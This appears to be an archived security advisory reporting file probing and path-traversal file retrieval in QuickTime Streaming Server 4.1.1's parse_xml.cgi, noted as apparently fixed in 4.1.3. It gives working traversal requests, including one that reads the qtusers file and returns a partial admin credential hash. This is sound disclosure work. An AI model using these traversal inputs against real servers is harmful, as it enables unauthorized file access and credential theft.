QuickTime/Darwin Streaming Administration Server Multiple vulnerabilities

Credit: Joe Testa
Risk: High
Local: Yes
Remote: No

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Word. I've found two other issues in QuickTime Streaming Server v4.1.1 that seem to be fixed in the newest v4.1.3: 1.) File probing: Request: http://localhost:1220/parse_xml.cgi?filename=../nonexistent Response: 'Can't access HTML file '../nonexistent'!' [...] Request: http://localhost:1220/parse_xml.cgi? filename=../../../autoexec.bat Response: 'Can't open HTML file '../../../autoexec.bat'! [...] As you can see, this discrepency in the error message allows an unauthenticated user to "feel-out" the file system and determine what structures and files exist. 2.) File retrieval: Request: http://localhost:1220/parse_xml.cgi?filename=.../qtusers Response: "realm Streaming Server admin:$dufr$D9/.....$C4g2VaRK" [...] This works against the Win32 platform, and not against the Linux platform; this was not tested against Solaris or MacOS X. Word. - Joe Testa, Rapid 7, Inc. http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x02B00839 A145 B158 2CA7 00A2 BAE8 4A18 57E5 18E0 02B0 0839 -----BEGIN PGP SIGNATURE----- Version: GnuPG v6.6.6 (X) iD8DBQE+X7N/V+UY4AKwCDkRApNaAJkBIiCYmP705zL3wt2tIoR7j2XbowCfeSmf OmiDhu+FpspKJpToTLZ5zRc= =Yq4D -----END PGP SIGNATURE-----

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com


Back to Top